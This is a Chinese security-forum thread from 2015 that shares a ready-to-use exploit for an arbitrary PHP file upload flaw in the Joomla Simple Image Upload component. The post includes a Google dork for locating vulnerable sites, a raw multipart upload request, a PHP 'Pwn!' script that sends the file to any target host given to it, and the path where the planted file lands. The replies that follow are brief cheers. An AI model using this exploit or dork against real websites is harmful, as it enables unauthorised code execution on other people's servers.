查看: 86601|回复: 164

Joomla SimpleImageUpload任意文件上传

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-6-26 19:32:58 | 显示全部楼层 |阅读模式
    [PHP] 纯文本查看 复制代码
    # Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
    # Google Dork: inurl:option=com_simpleimageupload
    # Date: 23.06.2015
    # Version: 1.0
    # Tested on: MsWin32
     
    # Vuln Same to Com_Media Vulnerability
     
    # Live Request :
     
    POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1
     
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: [url]http://www.unhonker.com/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc[/url]
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------247062787817068
     
     
    -----------------------------247062787817068\r\n
    Content-Disposition: form-data; name="Filedata"; filename="L0v3.php."\r\n
    Content-Type: application/x-php\r\n
    \r\n
    0wn3d ! ;)\r\n
    -----------------------------247062787817068\r\n
    Content-Disposition: form-data; name="return-url"\r\n
    \r\n
    aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
    -----------------------------247062787817068--\r\n
     
     
    # Exploit :
     
    <?php 
     
    echo '<form action="#"  method="post" enctype="multipart/form-data">
    <input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" />
    </form>';
     
     
    if($_POST) { 
         
        $target = $_POST['target'];
     
    $file = "0wn3d ! ;)"; 
    $header = array("Content-Type: application/x-php",
    "Content-Disposition: form-data; name=\"Filedata\"; file=\"L0v3.php.\"");
     
    $ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36");
    curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",)); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    $result = curl_exec($ch);
    curl_close($ch);
    print "$result";
     
    } else { die(); }
    ?>
     
     
    # Path of File : 127.0.0.1/images/[Rand0mString]L0v3.php
    # Sh00t to Mr_AnarShi-T;
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-6-26 22:19:22 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-6-27 11:53:04 | 显示全部楼层
    加油!干倒冰儿和酒仙!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 14:16:41 | 显示全部楼层
    加油!干倒冰儿和酒仙!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 15:30:26 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 18:19:03 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 19:47:40 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 11:35:02 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 17:14:43 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 00:42:24 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 04:36 , Processed in 0.040638 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部